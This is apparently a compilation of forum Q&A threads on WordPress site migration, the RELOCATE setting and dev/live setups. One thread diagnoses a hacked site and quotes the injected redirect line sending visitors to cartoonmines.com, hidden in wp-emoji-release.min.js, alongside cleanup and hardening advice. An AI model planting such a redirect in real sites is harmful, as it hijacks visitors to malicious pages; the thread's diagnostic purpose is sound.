It seems that using the define('RELOCATE') command is a convenient tool to perform site development using a local database and webserver, then to upload into production. Otherwise, its necessary to perform SQL REPLACE commands to update all the URLs in the posts, media and other content.
The Wordpress codex specifically states that it must be removed, but occasionally after removing, the links revert back to the dev server. Is there a reason for removal? it doesn't seem that security should be the issue, perhaps performance?
Thanks,
Jonathan
The reason you remove it is because define('RELOCATE',true); will point every visitor of your site to the admin login.
If you are still getting re-directed to the dev server then you need to re-configure your database.
Related
I have a website that is running on an AWS server using the Bitnami Nginx and WordPress image.
https://www.athleticclubhk.com/
Recently it got all our ads on Google stopped due to malicious content. Oddly this time, its trickier then your standard malware of infected files. When visiting the site incognito, the first and only the first link click gets redirected using the following code:
window.location.replace("https://cartoonmines.com/scount");window.location.href = "https://cartoonmines.com/scount";
This is being injected on any link, however, upon investigating the loaded code on inspect its not injecting it into the page.
I've tried to hunt down the theme, plugins, core files and found nothing!
I replaced and reinstalled WordPress core files, deactivated all plugins and even swapped the theme - the problem is still there. I can't find any hidden .htaccess file in the entire root directory.
I even used GREP to try to look for anything fishy (any clues here that someone can help with?) nothing so far.
The site is still impacted with this so you can easily load the link ~ i do use malwarebytes to keep myself protected, incase you are opening this directly.
Can anyone help?
The redirection code is implanted to /wp-includes/js/wp-emoji-release.min.js.
How to confirm:
watch the cookies when clicking internal page, a new cookie is being set for tracking first clicks, named ht_rr
save complete webpage locally and try to load it, and check in Chrome dev tools, you'll see that in Console tab it complains about this Javascript file attempting to set the aforementioned cookie
While a temporary resolution of deleting the file will fix things for some time...
There's no excuse for not setting up a proper server stack. Bitnami or other "great stacks" won't cut it security-wise. They exist for "fast", but no "quality" setup, and of course, it's never going to be secure.
The file got created somehow / had write privileges. This indicates a problem with the setup most of the time. Unless you're using some nulled plugins or plugins from bad sources.
Once again, since the website was essentially "pwned", deleting the Javascript file does not mean complete disinfection. To preserve things in a secure state, I would recommend setting things on a clean server environment with strict PHP-FPM permissions aka "lockdown" chmod, and look for write errors to look for infected PHP files.
Check out some guides on the matter of secure NGINX/PHP-FPM setup:
NGINX and PHP-FPM. What my permissions should be?
Best practice secure NGINX configuration for WordPress
NGINX Security Headers, the right way
Just had the same problem and it was Zend Font Plugin, the same that some people mentioned before.
Installed Wordfence and this came out. Deleted the plugin and now the site is working perfectly.
Disable plugins and check again.
Change the database username and password.
Ask the hosting manager to check the host.
I've got a copy of our wordpress instance running inside a Docker container.
Our live instance works well but inside the docker container, I do get a redirect-loop as soon as I try to get access to wp-admin.
I've disabled all plugins, I've cleared my cache and so on but nothing worked so far.
OS is debian, similar to our live system. When I get the redirect-loop, there's no information written in my apache error.log-file.
Oh and this instance is accessible by using a subdomain. I had to rewrite all "www.domain.com" to "sub.domain.com".
If I can provide you with any informations to solve my problem just ask. I have absolutely no idea where to start.
Paddaels
Seems like you missed some records in the database. The best approach is to use a tool like https://interconnectit.com/products/search-and-replace-for-wordpress-databases/
If you download this free tool and upload to your server then it does a batch find-and-replace across every single table in your Wordpress database.
So, for example, replace http://www.example.com with http://sub.example.com
You can do a dry run and it will show you all the replaces that it will make. Once you're happy then click the "live run" button and all the changes are made.
I use this tool all the time when I am moving a site from my local machine to the live server. I also use the exact same approach when migrating a site from http to https
I'm in the progress of setting up a development and live development environment for some basic projects I'm working on. Ideally I want git to push changes from the development server to the live site. However I want each version to use the exact same database so the posts and content are identical at all times.
Obviously the Site URL is set to only the live site so the development site's links don't work. If I overrode the site url in the wp-config.php file of each and used .gitignore to ignore both wp-config.php files would this be enough for this to work or is there something else I'm missing?
I'm posting in the hope somebody has tried it before me and that might have any answers to problems I encounter now or in the future.
Thanks in advance, Ollie
Make sure you add the .gitignore entry before changing and committing the wp-config.php.
Once you update wp-config.php, it's going to go through and update URLs in the database. Since WordPress is stateless - to say there is no session management, there is no way of tracking if a database has been swapped.
Lastly, WordPress uses a MySQL database, which wouldn't be versioned unless you went through a lot of work to do so. Aside from wp-config.php, there aren't any other stored references of what the site's URLs should be.
I have a live site built in Wordpress at www.site.com/name1.
The client wants a new theme. I've heavily modified the current theme with custom code and will need to do so with the new theme, all without interrupting the live site, so this wont be as simple as moving the site from one theme to another. Therefore I think I need to create a duplicate of the site at www.site.com/name2 because the content will all be the same. Doing this will give me a place to work on the redesign.
What is the best way to go about doing this? Should I have both use the same DB or not? When I get ready to go live should i simple redirect the domain to /name2 or move everything at /name2 to /name1?
Any help is appreciated.
Thanks,
Chris
If you want the same Data you can use the same DB but there is somes Options Tables dans Meta tables in the Wordpress DB, then if you change parameters on one site it will affect the other.
If you just recode the Theme without touching anything in the configuration you can use the same DB to test your theme with valid datas, but if you think you'll have to change paramaters i would prefer duplicate the Production DB to a Test DB to secure the production Website.
When you go live you'll just have to move your theme to the production website and copy your Option and Meta Tables.
If you're at a point where you're having clients, you should definitely develop locally. This will free you from the trouble of mistakingly messing up the production site.
Install Apache, MySQL and PHP on your own machine.
Copy database and files from production.
Change anything you'd like without exposing it to the Internet.
Upload your new, tailor-suited theme to production when it's ready to go live.
I've made a local version of my companies live website. My problem is that none of the links work and I can't sign into the admin control panel. I think it has something to do with clean-urls module. Any Ideas? The error I'm getting is url request was not found on this server.
If you made a full copy including the database, you must clear all caches, e.g. directly in the database, or using the Devel-Module. If no other settings have changed in the .htaccess, and there is no fixed url given in the settings.php (the $base_url), it should work.